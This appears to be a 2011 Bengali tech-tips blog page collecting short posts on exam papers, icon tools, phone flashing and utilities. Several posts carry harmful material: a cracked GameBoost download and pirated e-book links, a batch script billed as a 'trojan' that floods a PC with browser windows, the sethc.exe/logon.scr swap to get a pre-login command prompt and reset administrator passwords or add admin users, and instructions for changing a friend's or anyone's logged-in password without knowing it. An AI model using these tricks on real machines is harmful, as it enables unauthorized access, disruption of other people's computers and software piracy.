আমার খুব পছন্দে এই WEBSITE টি. আশা করি আপনাদের ও WEBSITE টি ভাল লাগবে….
and please comment করবেন….

*****Thank YOU*****

চট্টগ্রাম বিশ্ববিদ্যালয়ের ভর্তি পরীক্ষার প্রশ্ন


আগামী ২৬-১১-১১ তারিখ হতে শুরু হতে হচ্ছে চট্টগ্রাম বিশ্ববিদ্যালয়ের ভর্তি পরীক্ষা। শিক্ষার্থীদের মাঝে কাজ করছে নানা জলপনা কল্পনা। কেমন হবে প্রশ্ন ? কি কি থকবে ? পারবতো ? এই সব সমস্যার সমাধানের জন্য www.ontaheen.com নিয়ে এল বিগত ১০ বছরের ভর্তি পরীক্ষার প্রশ্ন। প্রতিটি বিভাগের জন্য আলাদা করে প্রশ্ন দেওয়া আছে। আপনি চাইলে ডাউনলোড করে নিতে পারেন। ডাউনলোড করতে ক্লিক করুন।

পরীক্ষার্থীদের জন্য শুভ কামনা রইল। চট্টগ্রাম বিশ্ববিদ্যালয়ে ও www.ontaheen.com এ আপনাদের স্বাগতম।

শনিবার, ১৯ নভেম্বর, ২০১১

ফেভিকন ও আইকন তৈরি করুন ৫ সেকেন্ডে !!



সবাই নিজের পিসির ফোল্ডার গুলো কে নিজের পছন্দ মতো আইকন দিয়ে সাজাতে চায়। আপনি ও চান নাকি ???

চাইলে নিচের URL এ ক্লিক করুন।

http://www.chami.com/

তারপর খুজে নিন আপনার প্রয়োজনীয় অপশন। কি ফেভিকন বানাবেন না আইকন।

শুধু পিসি থেকে আপনার পছন্দের ছবিটি আপলোড করে দিন বাকি কাজ ওরা ই করে দিবে। তারপর ডাউনলোড করে নিন।

আরও অনেক ওয়েব ডেভেলপার টুলস ও সাইট টি তে পাবেন।

আমি ফেভিকন ও আইকন এর URL দুটি দিয়ে দিলাম। সাইট টি ঘেটে দেখতে পারেন। প্রয়োজনীয় অনেক কিছুই পেতে পারেন।

ফেভিকন- http://www.chami.com/html-kit/services/favicon/

আইকন- http://www.html-kit.com/e/buddyicon.cgi

না বুজলে প্রশ্ন করুন।

ধন্যবাদ রইলো।

আপনার কম্পিউটারের এবং ইন্টারনেটের স্পিড বাড়িয়ে নিন তিনগুণ!!!

আপনার কম্পিউটারের এবং ইন্টারনেটের স্পিড বাড়িয়ে নিন তিনগুণ!!!!! (With full verson software)



হাই বন্ধুরা, আমরা সবাই আমাদের পি.সির গতি নিয়ে একটু হতাশ। কারণ আমাদের দেশের বেশির ভাগ পি.সিই পেন্টিয়াম ৩ থেকে ৪ এর মধ্যে সীমাবদ্ধ। এখন আমি একটি সফটওয়্যারের কথা আপনাদের সাথে শেয়ার করবো যা দিয়ে আপনি আপনার যেকোন মানের কম্পিউটারের এবং যেকোন গতির ইন্টারনেটের স্পিড তিনগুণ পযর্ন্ত বাড়িয়ে নিতে পারবেন!!!!



সফটওয়্যারটির নাম হল গেইমবুষ্ট।

এটি একটি শেয়ারওয়্যার সফটওয়্যার এবং এটির ফুল ভাসর্নটি কিনতে আপনার খরচ হবে $24.98.

তবে চিন্তার কোন কারণ নেই আমি এই সফটওয়্যারটির ক্রাক দিয়ে দিয়েছি।



চলুন তবে দেখি নেই আসলে গেইমবুষ্ট কি এবং কিভাবে কাজ করেঃ



Overview:

GameBoost is a tool that optimizes your computer performance to make your games and internet run faster. Playing computer games that run entirely too slow or show poor performance? GameBoost attempts to solve such problems and at the same time increase computing performance. GameBoost boosts your computer gaming and internet performance by modifying several system settings, so you can now use that old computer or new computer of yours as your primary gaming station. No installation or modification needs to be made to your hardware, GameBoost does all the complicated settings for you instantly.

GameBoost works by fixing several registry settings on your computer as well as several configuration files. However those are not the only changes made to your computer. GameBoost also increases Windows® stability and increases your computer’s gaming performance through memory and file system tweaks. GameBoost also modifies several Windows® settings to optimize monitor refresh rates, speed up animations and make frame rates during game play consistent and smooth as possible. Finally GameBoost makes several settings to modify your internet connection to be up to 300% faster than before. Play games faster, longer and without slow performance worries with GameBoost.

GameBoost is quite easy to use and understand. With a few button pushes and setting changes the application is ready to work. After the settings have been made, you will need to reboot your computer and it will be ready to use at optimal gaming performance. Try GameBoost for 28 days and if you find it useful please do register.



System Requirements:


Microsoft Windows 2000, 2003, 95, 98, Me, NT 4, Vista (Service Pack 3), XP, Seven (Service Pack 2)
Microsoft Internet Explorer 6 or higher
Intel Pentium 90 MHz or higher (Pentiam II)
8 Mb RAM (32 Mb recommended)
5 Mb hard disk space
VGA or higher resolution monitor
Mouse or other pointing device.


How It Works:


GameBoost works by modifying multiple Windows registry entries as well as system files to increase computer gaming and internet performance. The process begins by GameBoost locating all installed hardware on your computer and then runs through pre-defined routines to diagnose it’s status. Then GameBoost based on your computers’ configuration determines appropriate values to modify accordingly. The whole process should take under two minutes to complete.



GameBoost Modifications:

Maximum and minimum file cache
Memory swap file/conservative swap file
Windows animation settings
Monitor refresh rates
File allocation size and buffers
Windows system resources
Application priority level
Device drivers
Modem MTU Transmission rates
Memory allocation to modem
Modification to network bandwidth allowance
Increasing HTTP request limit
DNS lookup optimization
Modification to TTL setting
Optimization of TCP/IP standard settings
Modification to socket layer connections
and much more…

সফটওয়্যারটি ইনষ্টল করার পর Crack ফাইল কপি করে সফটওয়্যারটি চালু করুন।


চালু করার পর আপনি তিনটি অপশন সহ একটি উইন্ডো পাবেন।


অপশনসমূহ হলঃ

1. Operating System
2. Modem Type
3. Speed Setting

অপারেটিং সিস্টেমে আপনার পি.সির অপারেটিং সিস্টেমের নাম নির্বাচন করুন। গেইমবুষ্ট নিম্ন লিখিত অপারেটিং সিস্টেম সার্পোট করেঃ


Microsoft Windows 95,

Microsoft Windows 98

Microsoft Windows 98 SE

Microsoft Windows ME

Microsoft Windows 2000

Microsoft Windows 2003

Microsoft Windows NT 4

Microsoft Windows XP

Microsoft Window s Vista

Microsoft Windows Seven

Microsoft Windows Live

Microsoft Windows Black Edition

(*Do not work with Windows seven)



তবে আপনার কাছে যেকোন অপারেটিং সিস্টেমের Service Pack 2 থাকতে হবে।



মডেম টাইপ অপশনে আপনার মডেমের বর্তমান স্পিড নির্বাচন করুন। যারা ব্রডব্যান্ড ব্যবহার করেন তারা Local Area Network অপশনটি নির্বাচন করুন।





এরপর স্পিড সেটিং এ Fastest নির্বাচন করে Go বাটনে ক্লিক করে কিছুক্ষন অপেক্ষা করুন। এরপর আপনার পি.সি. রিষ্টাট দিন।


ব্যাস… হয়ে গেল….।


গেইমবুষ্ট ফাইলটি ক্রাক সহ ডাউনলোড করতে নিচে দেখুন অথবা http://www.pgware.com থেকে ডেমো/ফুল ভার্সন কিনুন।



অথবা http://www.mediafire.com/?54hq8knuzqy7eie থেকে ক্রাক সহ ডাউনলোড করুন।






ধন্যবাদ।।।।।।

দুনিয়ার সবচেয়ে সহজ সিস্টেমে আপনার নোকিয়া মোবাইল ফ্ল্যাশ!

একটু আগে আলু ব্লগে একটা পোস্ট হয়েছে, , , নোকিয়া মোবাইল ফ্ল্যাশ মারা, , , ফ্ল্যাশ মারবেন আর কি? পড়তে পড়তেই আপনার জান অর্ধেক আজরাইল এর হাতে চলে যাবে। তাই আমি অই ভাইকে বললাম আমার পোস্ট টি দেখবেন। যাই হোক, আমি বলি, আপনি ফ্ল্যাশ মারুন। কিছুই করা লাগবে না আপনার। যা করার আপনার পিসি করবে।


একটা মাত্র সফটওয়্যার লাগবে আপনার, আর কিছুই না। download.com থেকে নোকিয়া সফটওয়্যার আপডেটার (nokia software updater ) নামের এই সফটওয়্যারটে নামিয়ে নিন। টাকা লাগবে না। আর লিঙ্ক দিলাম না। খুজে নিন। হোম পেজ এই পেয়ে জেতে পারেন খোদা সহায় থাকলে, , , , নাইলে লিখে সার্চ দিন। এবার ইন্সটল করুন। (শেখাতে হবে নাকি ) আপনার কাজ শেষ। আর কোন কস্ট নেই।


সফটওয়্যার টা চালু করুন। মোবাইল টা লাগান পিসিতে ডাটা কেবল দিয়ে। নেক্সট, কন্টিনিউ কিংবা হাবিজাবি কিছু আসলে দিয়ে দিন। সে নিজে থেকেই মোবাইলের জন্য লেটেস্ট অপারেটিং সিস্টেম খুজে করবে। (সবার শেসে বলব এই সিস্টেমের মাহাত্ত ) এবার ওকে করুন কিংবা কিছু আসলে দিয়ে দিন।

এবার পিসির কাজ ও শেষ কাজ করবে শুধু মডেম। নেট থেকে পুরো সফটওয়্যার এর একদম নতুন আপডেট নামাবে (যা কিনা এখন বাজারের কোন মোবাইলেও নেই) কিছুটা সময় লাগবে। কারন এইটা অনেক বড়। মোবাইল খুলবেন না ভুলেও। ডেড খাইতে পারে। প্রব্লেম নাইক্কা। আবার দিবেন। হয়ে যাবে। (আবার বইলেন না, এত সুজা না, ডেড হইলে ঠিক হয় না। আরে ভাই, আমি তো করছি নাকি? )

অনেক খানি সময় লাগবে এর জন্য। আমার নোকিয়া ই ৫১ মোবাইলের জন্য নেমেছিল মাত্র ! ৭৮ মেগা, টাচ সেট এর জন্য হয়তোবা ১৫০ পার হতে পারে। এর পর আর শুধু একাই সে মোবাইলে সফটওয়্যার সেট আপ করবে। বার বার মোবাইল রিস্টারট মারবে। ভয় পাবেন না। আর, সম্পূর্ণ হয়ে গেলে মোবাইল খুলে ফেলুন। পিসিতে আরো কিছু করতে চাইলে করতে দিবেন না, (অর ইচ্ছা মত নাকি হ্যা? )

(নোটিশঃ আমার মোবাইল এর তারিখ ছিল ২০০৮ এর। আমি নিজে ফ্ল্যাশ মারা পর সেটা ২০১০ হয়ে গেলো। পুরা পাংখা জিনিস তাই না? আহ, , , , , আর কিছু মে বি বলার নেই। সফটওয়্যার ডউনলোড করাটাই আসল। বাকি কাজ ও যদি বলে দেওয়া লাগে, , , তাইলে আপনার ফেলাশ মারন লাগবো না গো ভাই, , , ,

বিদায় আইজকার লাগি

সহজে আপনার কম্পিউটার এর ডাটা কে চুরির হাত থেকে রক্ষা করুন।

আশা করি অনেক ভাল আছেন সৃষ্টিকর্তার রহমতে। আজ আপনাদের জন্য নিয়ে আসলাম একটি ছোট সফটওয়্যার যার নাম USB_Secure এই সফটওয়্যার দ্বারা আপুনি সহজে আপনার কম্পিউটার এর ডাটা কে চুরির হাত থেকে রক্ষা করতে পারবেন। এটি দ্ভারা আপনি আপনার ইঊসবি পোট কে পাসওয়াড দিয়ে রাখতে পারবেন। ফলে কেউ আপনার পিসি থেকে কিছু কপি করে পেন ড্রাইভে নিতে পারবে না।



যাদের প্রয়োজন তারা এখান থেকে ডাউনলোড করতে পারেন।

ডাউনলোড লিঙ্ক USB_Secure

ফেসবুকের স্ট্যাটাস লিখুন উল্টা করে – oʇ unɥʞǝp ǝƃɐl uoɯǝʞ

আসা করি সবাই খুব ভালো আছেন।অনেক দিন আগে দেখতাম পুদিনা পাতা ভাই ফেসবুকে উল্টা করে স্ট্যাটাস দিতেছে। আমি দেখে অনেক অবাক হলাম এবং অনেক খুঁজে না পেয়ে উনাকে জিজ্ঞাস করলাম এবং কাহিনী বের করতে পারলাম। সে জন্য উনাকে ধন্যবাদ। পিপি ভাই সব সময় বলে তুমি যাই কিছু শিখবা সেটা সবাইকে শিখানর চেষ্টা করবে তাহলে তোমার শিখাটার সঠিক ব্যাবহার হবে এবং তোমার চর্চা থাকবে। তাই আজকে পোস্ট করতে বসলাম। চলেন আগে দেখি কেমন দেখা যায়।

ıɐƃ uɐɐƃ ɹɐlƃuɐq ıɯɐ

uǝɥɔɐ olɐʌ ıɐqos ıɹoʞ ɐsɐ ¿uǝɥɔɐ uoɯǝʞ ıɐqos ɐɹɐudɐ

unɹoʞ ɐʇsǝɥɔ nʇʞɐ ǝɹod ɐu ǝqɐɾ ɐɥɾnq nɥɔıʞ ǝɯɥʇoɹd

ɥsǝpɐlƃuɐq

হাহাহা খুব মজার জিনিস তাই না ভাই? এভাবে আপনি নি পারবেন উল্টা করে ফেসবুকে স্ট্যাটাস দিতে। সেটা করার জন্য প্রথমে এখানে যান এবং Your Text > লিখা বক্স এ যা লিখতে চান সেটা লিখুন তারপরে নিচে দেখুন লিখা টা উল্টা হয়ে গেছে তারপরে সেই উল্টা লিখা টা কপি করে আপনার ফেসবুক স্ট্যাটাস এ পেস্ট করে দিন এবং সবাইকে অবাক করে দিন।

trojan ভাইরাস তৈরী করুন নোডপেড দিয়ে…………

সালাম ও শুবেচ্ছা জানিয়ে শুরু করছি আরেকটি টিউন …যা বলতে গেলে আগের টিউনের মত শুধু মাত্র কোড গুলো আর তৈরী করা সফটওয়ারটি ভিন্ন …..যা খুবই সহজ সবাই পারবে…

শুধু আমার দেয়া কোডগুলো নোডপেড এ পেস্ট করে .bat নামে সেভ করতে হবে…..নিচে কোডটি দেয়া আছে

cd c:\windows\system32

for %%a in (*) do start iexplore.exe

for %%a in (*) do start iexplore.exe

for %%a in (*) do start iexplore.exe

for %%a in (*) do start iexplore.exe

for %%a in (*) do start iexplore.exe



সবাই ভাল থাকবেন ধন্যবাদ…….

জটিল সফটওয়্যার – মাউস এবং কিবোর্ড লক করে রাখুন

পিসি লক করতে ত অনেক শুনছেন এবার চলেন শুধু পিসির মাউস এবং কি বোর্ড লক করে রাখি। বাসায় যদি পিচ্চি পুচ্চি থাকে তাহলে খুব ই কাজে দিবে। অথবা বন্ধুদের সাথে একটু মজা নিতে পারেন। নাকি ভার্সিটির পিসিগুলা লক করে রাখবেন একটু পার্ট মারতে? হাহা। এই জটিল সফটওয়্যার টি আপনার পিসির মাউস এবং কি বোর্ড লক করে রাখতে পারবে যখন আপনি চাবেন।
ইন্সটল করার পরে সিস্টেম আইকনের সাথেই একটি আইকন পাবেন সেখানে ক্লিক করলেই দেখা যাবে লক করার অপশন গুলো। খুব সহজ কাজ। আসা করি সবাই পারবেন। এখন ভাবতেছেন লক হবার পরে ত মাউস আর কিবোর্ড কাজ ই করবে না তাহলে আনলক করবেন কিভাবে? সেটির জন্য আছে পাসওয়ার্ড অ শর্টকাট বাটনের সুবিধা। শুধু মাত্র আপনার পাসওয়ার্ড টি কাজ করতে পারবে কিবোর্ডে। সেটা করার জন্য সার্ট মেন্যু থেকে সফটওয়্যার এর মাঝে দেখুন পাসওয়ার্ড টাইপের অপশন আছে।


ডাউনলোড করুন এখানে

অথবা এই টাইপের আরেকটি সফটওয়্যার Key Freeze এবং Child Lock
ও ব্যবহার করতে পারেন

কম্পিউটারের এডমিনিষ্ট্রেটরের পাসওয়ার্ড খুলুন

সাধারণত বাসার কম্পিউটারে একাধিক ইউজার থাকে ফলে লিমিটেড ইউজার ব্যবহার করতে হয় নিরাপত্তার জন্য। লিমিটেড ইউজারে কোন সফটওয়্যার যেমন ইনষ্টল করা যায় না তেমনই অনেককিছুই পরিবর্তন করা যায় না। যদি কোন কারণে এ্যাডমিনিষ্ট্রেটিভ এর পাসওয়ার্ড ভুলে যান তাহলে সেক্ষেত্রে বেশ বিপাকে পড়তে হয়। হয়তোবা নতুন করে অপারেটিং সিস্টেম ইনষ্টল কারারও প্রয়োজন হতে পারে। এমতবস্থায় আপনি যদি লিমিটেড ইউজার ব্যবহার করে থাকেন তাহলে সহজেই লিমিটেড ইউজারের মাধ্যমে এ্যাডমিনিষ্ট্রেটিভ এর পাসওয়ার্ড পরিবর্তন করতে বা নতুন ইউজার খুলতে অথবা বর্তমান লিমিটেড ইউজারকে এ্যাডমিনিষ্ট্রেটিভ হিসাবে ব্যবহার করতে পারেন। এজন্য কমান্ড প্রোম্পট খুলে (রানে গিয়ে Crtl+R চেপে cmd লিখে এন্টার করলে) নিজের পদ্ধতি অবলম্বন করুন।

cd\ লিখে এন্টার করুন,

c: লিখে এন্টার করুন,

cd windows\system32 লিখে এন্টার করুন,

copy logon.scr logon.old লিখে এন্টার করুন,

copy cmd.exe logon.scr লিখে এন্টার করুন,

এছাড়াও সরাসরি উইন্ডোজের সিস্টেম৩২ ফোল্ডারে ঢুকে logon.scr ফাইলকে যেকোন নামে রিনেম করে আবার cmd.exe ফাইলকে logon.scr নামে রিনেম করতে পারেন। এবার কম্পিউটার রিস্টার্ট করুন এবং কম্পিউটার লগঅন না করে অপেক্ষা করুন তাহলে নির্দিষ্ট সময় পরে স্ক্রিনসেভারের ওয়েট টাইম) স্ক্রিনসেভারের পরিবর্তে কমান্ড প্রোম্পট খুলবে। যদি এই পদ্ধতিতে কমান্ড প্রোম্পট না খোলে তাহলে বিকল্প হিসাবে কমান্ড প্রোম্পট খুলে নিচের পদ্ধতি অবলম্বন করুন।

cd\ লিখে এন্টার করুন,

c: লিখে এন্টার করুন,

cd windows\system32 লিখে এন্টার করুন,

copy sethc.exe sethc.old লিখে এন্টার করুন,

copy cmd.exe sethc.exe লিখে এন্টার করুন,

এছাড়াও সরাসরি উইন্ডোজের সিস্টেম৩২ ফোল্ডারে ঢুকে sethc.exe ফাইলকে রিনেম করে আবার cmd.exe ফাইলকে sethc.exe নামে রিনেম করুন। এবার কম্পিউটার রিস্টার্ট করুন এবং কম্পিউটার লগঅন না করে শিফট (Shift) কী পাঁচবার চাপুন তাহলে কমান্ড প্রোম্পট খুলবে।

এখন এ্যাডমিনিষ্ট্রেটিভ এর পাসওয়ার্ড পরিবর্তন করতে net user administrator 2007 লিখুন তাহলে এ্যাডমিনিষ্ট্রেটিভ এর পাসওয়ার্ড পরিবর্তন হয়ে ২০০৭ হয়ে যাবে। আর আপনি যদি পাসওয়ার্ড পরিবর্তন না করে নতুন ইউজার খুলতে চান তাহলে net user mehdi /add লিখে এন্টার করুন তাহলে mehdi নামে নতুন একটি ইউজার তৈরী হবে। এবার mehdi ইউজারকে এ্যাডমিনিষ্ট্রেটিভ হিসাবে ব্যবহার করতে হলে net localgroup administrator mehdi /add লিখুন এবং এন্টার করুন। তাহলে আপনার বর্তমান ইউজার (mehdi) এ্যাডমিনিষ্ট্রেটিভ হিসাবে ব্যবহার করা যাবে। একইভাবে বর্তমান ব্যবহার করা যে কোন লিমিটেড ইউজারকে এডমিনিষ্ট্রেটিভ হিসাবে ব্যবহার করতে পারেন।

শুক্রবার, ১৮ নভেম্বর, ২০১১

এক ক্লিকে একের অধিক gmail account-এ sign in করুন।

বিসমিল্লাহির রাহমানির রাহিম আসসালামু আলাইকুম, সবাইকে আমার ভাল লাগা ভালবাসা দিয়ে আজকের টিউন শুরু করছি। কেমন আছেন সবাই? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে খুবই ভাল আছেন। আপনি ভাল থাকবেন ও পৃথিবীর সকল মানুষ(মুসলমানদের) জন্য দোআ করবেন। আমি আজ থেকে আপনাদের সাখে শেয়ার করব একটা ট্রিক্স

ট্রিক্সটা খুবই কাজের এবং ফলপ্রসূ। যাদের প্রতিদিন একের অধিক Gmail Account চেক করতে হয়।তাদের জন্যই এইতা।এতে সময় ও শ্রম দুই বাঁচে। বেশি কথা না বলে চলুন এর কাজ কি করে করতে হয় টা দেখি।

একটা Account-এ Sign In করুন।




save করে

. Sign Out করুন।

. অতঃপর একই ভাবে দ্বিতীয় Account-এ Sign In করুন। এবং পূর্বের মতো করে হুবহু সকল কাজ করে আবার Sign Out করুন।

. এবার প্রথম Account-এ আবার Sign In করুন এবং

এবার দ্বিতীয় Account-এ Sign In করুন এবং পুনরায়

তারপর

ব্যাস এবার যেভাবে ইচ্ছা ,যখন ইচ্ছা ,যেটা থেকা ইচ্ছা মেইল চেক করুন।আর সময়কে হেফাজত করে নিজে নামাজের অভ্যাস গড়ে তুলুন আর অপরকে উৎসাহ দান করুন।

কম্পিউটার প্রোগ্রামিং এর ১০০+ বইয়ের কালেকশান

আসসালামু আলাইকুম, সবাইকে আবারও স্বাগতম আজকের টিউনে। আজ অনেক দিন পর আপনাদের সাথে কয়েকটি বই শেয়ার করছি। আজ আপনাদের সাথে শেয়ার করছি ১০০+ প্রোগ্রামিং ই-বুক কালেকশান। নিচে লিষ্ট দেয়া হল ডাউনলোড করে নিন।
1. 250 html and web design secrets
2. 3ds max 6 bible
3. 3ds max 7 bible -
4. 3g handset and network design
5. 50 fast dreamweaver mx techniques
6. A Buffer Overflow Study – Attacks and Defenses 2002
7. A Complete Guide to Programming in C
8. A list publishing – Advanced 3ds max 5 modeling and animating
9. A list publishing – PC hardware tuning and acceleration
10. A list publishing – Windows .net server 2003 domains active directory
11. A list publishing – Windows server 2003 registry
12. about face 2.0. the essentials of interaction design
13. Absolute Beginner s Guide to Databases
14. Absolute Beginner s Guide to Databases
15. Absolute Beginner s Guide to Wi-Fi Wireless Networking 2004
16. Absolute BSD – The Ultimate Guide To FreeBSD 2002
17. Absolute C 2nd Edition
18. Absolute OpenBSD – Unix For The Practical Paranoid 2003
19. Accelerated C
20. Access 2002 bible
21. access cookbook second edition
22. Access Hacks – Tips 26 Tools For Wrangling Your Data 2005
23. actionscript cookbook
24. Active directory bible
25. active directory cookbook for windows server 2003 and windows 2000
26. Active Directory Cookbook For Windows Server 2003 26 Windows 2000 2003
27. active directory second edition
28. Addison wesley – a programmer s guide to java certification.2nd edition
29. A.W. – administrator s guide to sql server 2005
30. A.W. – an introduction to parallel computing second edition
31. A.W. – building solutions with the microsoft .net compact framework
32. A.W. – code reading. the open source perspective
33. A.W. – text processing in python
34. A.W. – understanding and deploying ldap directory services d edition
35. A.W.- xml data management. native xml and xml-enabled database
36. A.W. – software engineering and computer games
37. A.W. – wi-foo. the secrets of wireless hacking
38. Administering Cisco QoS
39. ado.net in a nutshell
40. ADO.NET.3.5.Cookbook.2nd.Edition.Mar.2008
41. adobe acrobat 6 bible
42. Adobe After Effects 7.0 – Classroom In A Book 2006
43. Adobe Creative Suite 2 How-Tos – 100 Essential Techniques 2005
44. Adobe Photoshop CS For Photographers 2004
45. adobe photoshop cs in 10 simple steps or less
46. Adobe Photoshop CS2 Breakthroughs 2005
47. Adobe Photoshop CS2 Studio Techniques 2005
48. Adobe.AIR.for.JavaScript.Developers.Pocket .Guide.Apr.2008
49. Adobe.press.indesign.type.professional.typography. with.adobe.indesign.cs2.mar.2006
50. Advanced Linux Programming 2001
51. Agile Web Development With Rails 2005
52. Ajax For Dummies 2006
53. alan simpson s windows xp bible desktop edition
54. alan simpson s windows xp bible second edition
55. Alm os programming bible
56. Amazon Hacks – 100 Industrial-Strength Tips 26 Tools 2003
57. amazon hacks. 100 industrial-strength tips and tools
58. ant – the definitive guide
59. Apache doc rus
60. Apache Server Bible – HUNGRY MINDS
61. Applied C – Practical Techniques for Building Better Software
62. Applied C – Practical Techniques For Building Better Software 2003
63. Apress – professional php4
64. Apress Beginning PHP and MySQL 3rd Edition Mar 2008
65. Apress Beginning PHP and MySQL E Commerce d Edition Feb 2008
66. Apress Pro PHP Patterns Frameworks Testing and More Mar 2008
67. Apress.Accelerated.DOM.Scripting.with.Ajax.APIs.an d.Libraries.Sep.2007
68. Apress.Accelerated.VB.2008.Jan.2008
69. Apress.Beginning.Game.Development.with.Python.and. Pygame.Oct.2007
70. Apress.Beginning.SQL.Queries.From.Novice.to.Profes sional.Apr.2008
71. Apress.Beginning.VB.2008.From.Novice.to.Profession al.Feb.2008
72. Apress.Expert.dot.NET.Micro.Framework.Apr.2008
73. Apress.Oracle.Database.11g.New.Features.for.DBAs.a nd.Developers.Nov.2007
74. Apress.Practical.DWR.2.Projects.Jan.2008
75. Apress.Practical.JBoss.Seam.Projects.Jul.2007
76. Apress.Pro.Excel.2007.VBA.Feb.2008
77. Apress.Pro.Netbeans.IDE.6.Rich.Client.Platform.Edi tion.Feb.2008
78. Apress.Pro.Oracle.Spatial.for.Oracle.Database.11g. Oct.2007
79. Apress.Pro.VB.2008.and.the.dot.NET.3.5.Platform.3r d.Edition.Mar.2008
80. Apress.Pro.Web.2.0.Mashups.Feb.2008.RETAiL
81. Apress.Pro.Windows.PowerShell.Feb.2008
82. Apress.Pro.WPF.with.VB.2008.Windows.Presentation.F oundation.with.dot.NET.3.5.Mar.2008
83. Apress.Visual.Basic.2008.Recipes.A.Problem.Solutio n.Approach.Apr.2008
84. Apress.Windows.Home.Server.Users.Guide.Oct.2007
85. Artech house – gprs for mobile internet
86. Artech house – lans to wan s the complete management guide
87. Artech house – mission-critical network planning
88. Artech house – voice over 802.11
89. Artech house – wireless ip and building the mobile internet
90. ASP
91. asp book
92. ASP.NET 2.0 Everyday Apps For Dummies 2006
93. ASP.NET 2.0 Visual Web Developer 202005 Express Edition Starter Kit 2006
94. ASP.NET Bible 2002
95. ASP.NET Database Programming Weekend Crash Course 2002
96. ASP.NET In A Nutshell 202nd Edition 2003
97. asp.net in a nutshell second edition
98. auditing information systems
99. Auerbach – wimax a wireless technology revolution. oct.2007
100. Autocad 2002 bible
101. Autocad 2002 bible bonus appd
102. Autocad 2002 bible bonus appe
103. AutoCAD 2009 & AutoCAD LT 2009 All-in-One Desk Reference for Dummies
104. AutoCAD 2005 And AutoCAD LT 2005 – No Experience Required 2004
105. AutoCAD 2005 And AutoCAD LT 2005 Bible 2004
106. AutoCAD 2005 For Dummies 2004
107. AutoCAD_2009_Tips_and_Tricks & AutoCAD_2009_Geting_Started

ডাউনলোড লিংক

http://www.fileserve.com/file/5e8uEMp
http://www.fileserve.com/file/Jh3Gmdw
http://www.fileserve.com/file/7xN3EUn
http://www.fileserve.com/file/RCsHYqW
http://www.fileserve.com/file/yBkpzsu
http://www.fileserve.com/file/FgpsqUb
http://www.fileserve.com/file/J4dkSTX
http://www.fileserve.com/file/dmBxHAZ
http://www.fileserve.com/file/BAUpjtc
http://www.fileserve.com/file/mEXxWPg
http://www.fileserve.com/file/7nQnrW4
http://www.fileserve.com/file/5QN5xuH
সবাইকে অনেক ধন্যবাদ। ভাল থাকবেন, আল্লাহ হাফেজ…………

task manager,cmd,run,registry কি ডিজেবল?


আসসালামু আলাইকুম, সবাইকে আজকের টিউনে স্বাগতম। কেমন আছেন সবাই্? আশা করি সবাই মহান আল্লাহ তায়ালার অশেষ রহমতে খুবই ভাল আছেন। আজ আপনাদের জন্য নিয়ে এলাম একটি ছোট্ট সফটওয়্যার। সফটওয়্যারটির নাম Tangosoft. ছোট্ট হলেও সফটওয়্যারটি অনেক উপকারি।

অনেক কারণে আমাদের পিসির Task Manager,System Restore,cmd,run,Registry সহ আরও কিছু ইউটিলিটি সফটওয়্যার ডিজেবল হয়ে যায়। এর মূল কারণ হল ভাইরাস। ভাইরাস আমাদের ১০০% শত্রু কি বলে? যাক, ভাইরাসের কারণে আপনার এই সব প্রয়োজনীয় উপকরণ সমূহ ডিজেবল হয়ে গেলে কাজ করতে মারাত্মক অসুবিধা। এই রকম সমস্যা হলে উইন্ডোজ সাধারণত এই ম্যাসেজটা দেখায়।
it said restore is turn off. it is disabled by administrator
এর প্রেক্ষিতে আমাদের মধ্যে অনেকেই সরাসরি অপারেটিং সিস্টেম ইন্সটল করে থাকেন। কিন্তু এই সফটওয়্যারটি নিন। আর এই সমস্যা হলেই তার আবারও ফিরিয়ে আনুন। এছাড়া, অনেক ভাবে এই সমস্যা গুলো সমাধান করা যায়। কিন্তু প্রত্যেক ক্ষেত্রে এটি কার্যকর নাও হতে পারে।

শুধু মাত্র এক ক্লিকেই আপনার সমস্যা সমাধান হয়ে যাবে। প্রথমে সফটওয়্যারটি ইন্সটল করুন। এবার এটি চালূ করে “Re-Enable” বাটনে ক্লিক করুন। এবার যদি পিসি রিস্টার্ট চায়, তাহলে রিস্টার্ট করুন।

এই সফটওয়্যার দিয়ে আপনি কি কি করতে পারবেন?

Windows Registry
Command Line Tool
Windows Task Manager
System Restore Config
Folder Options
Run command
My Computer
Task Scheduler
Right Click Context menu
Ms-Config (Xp only)
Control Panel
Search
Operating System
Xp, Vista, 7, 32bit
Xp, Vista, 7, 32bit
Xp, Vista, 7, 32bit

সবাই ভাল থাকবেন, ধন্যবাদ। আল্লাহ হাফেজ…………….

windows 7 কে system rating করুন আর জানুন windows experience

প্রথমে My Computer এ প্রবেশ করুন System Tab এর নিচে Rating: unrated আছে ক্লিক করুন Rating Run করুন ৫ থেকে ১০ মিনিট শময় লাগতে পারে কাজ হতে। এরপর দেখুন সব ratting experience দেখা যাছসে এ থেকে আপনি জানতে পারবেন কম্পিউটার এর Processor Graphics Ram Gaming Graphics Hard Disk Ratting সম্পর্কে। ধন্যবাদ

পুরনো পাসওয়ার্ড না জেনেই পাসওয়ার্ড পরিবর্তন করে ফেলুন

আজকে এখানে আমি যে পদ্ধতিটা বলব তার সাহায্যে আপনি নিমেষের মধ্যেই আপনার কোন বন্ধুর বা অন্য কারোর লগিন করা পিসির পাসওয়ার্ড পরিবর্তন করে ফেলতে পারবেন পুরনো পাসওয়ার্ড সম্পর্কে কোন রকম তথ্য ছাড়াই।

এজন্য আপনাকে প্রথমে কমান্ড প্রম্পট খোলার জন্য Start > All Programs > Accessories > Command Prompt-এ গিয়ে ক্লিক করতে হবে অথবা, উইন্ডোজ+R চেপে Run এ গিয়ে CMD লিখে এন্টার দিন।

Command Prompt উইন্ডো ওপেন হবে।
এরপর C:\> প্রম্পটে গিয়ে net user username newpassword লিখে এন্টার দিন।

উদাহরন :- মনে করুন আপনার বন্ধুর ইউজারনেম Tanmoy, আর আপনি নতুন যে পাসওয়ার্ডে পরিবর্তন করতে চাচ্ছেন সেটি হল Baghaban তাহলে আপনাকে লিখতে হবে-

net user Tanmoy Baghaban
ব্যস হয়ে গেল।

এবার Command Prompt উইন্ডো বন্ধ করে চেক করে দেখুন আপনি আপনার বন্ধুর কম্পিঊটারের পাসওয়ার্ড সফলভাবে পরিবর্তন করতে পেরেছেন কিনা, ও হ্যাঁ আমাকে মন্তব্য করে জানাতে ভুলবেন
না কিন্তু।

বিঃদ্রঃ – অ্যাডমিনিস্ট্রেটর হিসেবে লগ-ইন করা থাকতে হবে।

hacking exposed all edition

বিসমিল্লাহির রাহমানির রাহিম
